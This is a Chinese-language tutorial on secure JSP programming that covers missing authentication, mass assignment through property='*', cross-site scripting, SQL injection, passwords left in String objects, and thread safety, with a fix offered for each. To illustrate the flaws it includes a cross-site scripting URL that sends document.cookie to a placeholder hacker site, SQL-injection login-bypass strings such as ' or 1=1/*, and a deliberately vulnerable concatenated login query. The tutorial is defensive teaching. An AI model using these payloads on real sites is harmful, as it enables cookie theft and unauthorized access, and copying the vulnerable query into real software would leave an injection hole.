分享
 
 
 

JSP开发的安全编程实例详细解析

王朝java/jsp·作者佚名  2006-11-24
窄屏简体版  字體: |||超大  

Java Server Page(JSP)作为建立动态网页的技术正在不断升温。JSP和ASP、PHP、工作机制不太一样。一般说来,JSP页面在执行时是编译式,而不是解释式的。首次调用JSP文件其实是执行一个编译为Servlet的过程。

当浏览器向服务器请求这一个JSP文件的时候,服务器将检查自上次编译后JSP文件是否有改变,如果没有改变,就直接执行Servlet,而不用再重新编译,这样,效率便得到了明显提高。

今天我将和大家一起从脚本编程的角度看JSP的安全,那些诸如源码暴露类的安全隐患就不在这篇文章讨论范围之内了。写这篇文章的主要目的是给初学JSP编程的朋友们提个醒,从一开始就要培养安全编程的意识,不要犯不该犯的错误,避免可以避免的损失。

一、认证不严 低级失误

user_manager.jsp是用户管理的页面,作者知道它的敏感性,加上了一把锁:

if ((session.getValue("UserName")==null)

││(session.getValue("UserClass")==null)

││(! session.getValue

("UserClass").equals("系统管理员")))

{

response.sendRedirect("err.jsp?id=14");

return;

}

如果要查看、修改某用户的信息,就要用modifyuser_manager.jsp这个文件。管理员提交http://www.somesite.com/yyforum/modifyuser_manager.jsp?modifyid=51

就是查看、修改ID为51的用户的资料(管理员默认的用户ID为51)。

但是,如此重要的文件竟缺乏认证,普通用户(包括游客)也直接提交上述请求也可以对其一览无余(密码也是明文存储、显示的)。modifyuser_manage.jsp同样是门户大开,直到恶意用户把数据更新的操作执行完毕,重定向到user_manager.jsp的时候,他才会看见那个姗姗来迟的显示错误的页面。

显然,只锁一扇门是远远不够的,编程的时候一定要不厌其烦地为每一个该加身份认证的地方加上身份认证。

二、守好JavaBean的入口

JSP组件技术的核心是被称为bean的java组件。在程序中可把逻辑控制、数据库操作放在javabeans组件中,然后在JSP文件中调用它,这样可增加程序的清晰度及程序的可重用性。和传统的ASP或PHP页面相比,JSP页面是非常简洁的,因为许多动态页面处理过程可以封装到JavaBean中。要改变JavaBean属性,要用到“<jsp:setProperty>”标记。

下面的代码是假想的某电子购物系统的源码的一部分,这个文件是用来显示用户的购物框中的信息的,而checkout.jsp是用来结帐的。

<jsp:useBean id="myBasket"

class="BasketBean">

<jsp:setProperty

name="myBasket" property="*"/>

<jsp:useBean>

<html>

<head><title>Your

Basket</title></head>

<body>

<p>

You have added the item

<jsp::getProperty name=

"myBasket" property="newItem"/>

to your basket.

<br/>

Your total is $

<jsp::getProperty name=

"myBasket" property="balance"/>

Proceed to <a href=

"checkout.jsp">checkout</a>

注意到property="*"了吗?这表明用户在可见的JSP页面中输入的,或是直接通过Query String提交的全部变量的值,将存储到匹配的bean属性中。一般,用户是这样提交请求的:

http://www.somesite.com

/addToBasket.jsp?newItem=ITEM0105342

但是不守规矩的用户呢?他们可能会提交:

http://www.somesite.com

/addToBasket.jsp?newItem=ITEM0105342&balance=0

这样,balance=0的信息就被在存储到了JavaBean中了。当他们这时点击“chekout”结账的时候,费用就全免了。这与PHP中全局变量导致的安全问题如出一辙。由此可见:“property="*"”一定要慎用!

三、长盛不衰的跨站脚本

跨站脚本(Cross Site Scripting)攻击是指在远程WEB页面的HTML代码中手插入恶意的JavaScript, VBScript, ActiveX, HTML, 或Flash等脚本,窃取浏览此页面的用户的隐私,改变用户的设置,破坏用户的数据。

跨站脚本攻击在多数情况下不会对服务器和WEB程序的运行造成影响,但对客户端的安全构成严重的威胁。举个最简单的例子。当我们提交:

http://www.somesite.com/acjspbbs

/dispuser.jsp?name=someuser<;script>

alert(document.cookie)</script>

便能弹出包含自己cookie信息的对话框。而提交:

http://www.somesite.com/acjspbbs

/dispuser.jsp?name=someuser<;script>

document.location='http://www.163.com'</script>

就能重定向到网易。

由于在返回“name”变量的值给客户端时,脚本没有进行任何编码或过滤恶意代码,当用户访问嵌入恶意“name”变量数据链接时,会导致脚本代码在用户浏览器上执行,可能导致用户隐私泄露等后果。比如下面的链接:

http://www.somesite.com/acjspbbs

/dispuser.jsp?name=someuser<;script>

document.location='http://www.hackersite.com

/xxx.xxx?'+document.cookie</script>

xxx.xxx用于收集后边跟的参数,而这里参数指定的是document.cookie,也就是访问此链接的用户的cookie。在ASP世界中,很多人已经把偷cookie的技术练得炉火纯青了。在JSP里,读取cookie也不是难事。当然,跨站脚本从来就不会局限于偷cookie这一项功能,相信大家都有一定了解,这里就不展开了。

对所有动态页面的输入和输出都应进行编码,可以在很大程度上避免跨站脚本的攻击。遗憾的是,对所有不可信数据编码是资源密集型的工作,会对 Web 服务器产生性能方面的影响。常用的手段还是进行输入数据的过滤,比如下面的代码就把危险的字符进行替换:

<% String message =

request.getParameter("message");

message = message.replace ('<','_');

message = message.replace ('>','_');

message = message.replace ('"','_');

message = message.replace ('\'','_');

message = message.replace ('%','_');

message = message.replace (';','_');

message = message.replace ('(','_');

message = message.replace (')','_');

message = message.replace ('&','_');

message = message.replace ('+','_'); %>

更积极的方式是利用正则表达式只允许输入指定的字符:

public boolean isValidInput(String str)

{

if(str.matches("[a-z0-9]+")) return true;

else return false;

}

四、时刻牢记SQL注入

一般的编程书籍在教初学者的时候都不注意让他们从入门时就培养安全编程的习惯。著名的《JSP编程思想与实践》就是这样向初学者示范编写带数据库的登录系统的(数据库为MySQL

Statement stmt = conn.createStatement();

String checkUser =

"select * from login where username =

'" + userName + "' and userpassword =

'" + userPassword + "'";

ResultSet rs = stmt.executeQuery(checkUser);

if(rs.next())

response.sendRedirect("SuccessLogin.jsp");

else

response.sendRedirect("FailureLogin.jsp");

这样使得尽信书的人长期使用这样先天“带洞”的登录代码。如果数据库里存在一个名叫“jack”的用户,那么在不知道密码的情况下至少有下面几种方法可以登录:

用户名:jack

密码:' or 'a'='a

用户名:jack

密码:' or 1=1/*

用户名:jack' or 1=1/*

密码:(任意)

lybbs(论坛)ver

Server在LogInOut.java中是这样对登录提交的数据进行检查的:

if(s.equals("")

││ s1.equals(""))

throw new UserException

("用户名或密码不能空。");

if(s.indexOf("'") != -1

││ s.indexOf("\"") != -1

││ s.indexOf(",") != -1

││ s.indexOf("\\") != -1)

throw new UserException

("用户名不能包括 ' \" \\ , 等非法字符。");

if(s1.indexOf("'")

!= -1 ││ s1.indexOf("\"") != -1

││ s1.indexOf("*") != -1

││ s1.indexOf("\\") != -1)

throw new UserException

("密码不能包括 ' \" \\ * 等非法字符。");

if(s.startsWith("")

││ s1.startsWith(""))

throw new UserException

("用户名或密码中不能用空格。");

但是我不清楚为什么他只对密码而不对用户名过滤星号。另外,正斜杠似乎也应该被列到“黑名单”中。我还是认为用正则表达式只允许输入指定范围内的字符来得干脆。

这里要提醒一句:不要以为可以凭借某些数据库系统天生的“安全性”就可以有效地抵御所有的攻击。pinkeyes的那篇《PHP注入实例》就给那些依赖PHP的配置文件中的“magic_quotes_gpc = On”的人上了一课。

五、String对象带来的隐患

Java平台的确使安全编程更加方便了。Java中无指针,这意味着Java程序不再像C那样能对地址空间中的任意内存位置寻址了。在JSP文件被编译成.class文件时会被检查安全性问题,例如当访问超出数组大小的数组元素的尝试将被拒绝,这在很大程度上避免了缓冲区溢出攻击。

但是,String对象却会给我们带来一些安全上的隐患。如果密码是存储在 Java String 对象中的,则直到对它进行垃圾收集或进程终止之前,密码会一直驻留在内存中。即使进行了垃圾收集,它仍会存在于空闲内存堆中,直到重用该内存空间为止。

密码 String 在内存中驻留得越久,遭到窃听的危险性就越大。更糟的是,如果实际内存减少,则操作系统会将这个密码 String 换页调度到磁盘的交换空间,因此容易遭受磁盘块窃听攻击。为了将这种泄密的可能性降至最低(但不是消除),您应该将密码存储在 char 数组中,并在使用后对其置零(String 是不可变的,无法对其置零)。

六、线程安全初探

“JAVA能做的,JSP就能做”。与ASP、PHP等脚本语言不一样,JSP默认是以多线程方式执行的。以多线程方式执行可大大降低对系统的资源需求,提高系统的并发量及响应时间。线程在程序中是独立的、并发的执行路径,每个线程有它自己的堆栈、自己的程序计数器和自己的局部变量。

虽然多线程应用程序中的大多数操作都可以并行进行,但也有某些操作(如更新全局标志或处理共享文件)不能并行进行。如果没做好线程的同步,在大并发量访问时,不需要恶意用户的“热心参与”,问题也会出现。

最简单的解决方案就是在相关的JSP文件中加上:

<%@ page isThreadSafe="false" %>

指令,使它以单线程方式执行,这时,所有客户端的请求以串行方式执行。这样会严重降低系统的性能。我们可以仍让JSP文件以多线程方式执行,通过对函数上锁来对线程进行同步。一个函数加上synchronized 关键字就获得了一个锁。看下面的示例:

public class MyClass

{

int a;

public Init()

{

//此方法可以多个线程同时调用

a = 0;

}

public synchronized void Set()

{

//两个线程不能同时调用此方法

if(a>5)

{

a= a-5;

}

}

}

但是这样仍然会对系统的性能有一定影响。一个更好的方案是采用局部变量代替实例变量。因为实例变量是在堆中分配的,被属于该实例的所有线程共享,不是线程安全的,而局部变量在堆栈中分配,因为每个线程都有它自己的堆栈空间,所以这样线程就是安全的了。比如凌云论坛中添加好友的代码:

public void addFriend

(int i, String s, String s1)

throws DBConnectException

{

try

{

if……

else

{

DBConnect dbconnect

= new DBConnect("insert into friend

(authorid,friendname) values (?,?)");

dbconnect.setInt(1, i);

dbconnect.setString(2, s);

dbconnect.executeUpdate();

dbconnect.close();

dbconnect = null;

}

}

catch(Exception exception)

{

throw new DBConnectException

(exception.getMessage());

}

}

下面是调用:

friendName=ParameterUtils.getString

(request,"friendname");

if(action.equals("adduser"))

{

forumFriend.addFriend

(Integer.parseInt(cookieID),

friendName,cookieName);

errorInfo=forumFriend.getErrorInfo();

}

如果采用的是实例变量,那么该实例变量属于该实例的所有线程共享,就有可能出现用户A传递了某个参数后他的线程转为睡眠状态,而参数被用户B无意间修改,造成好友错配的现象。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有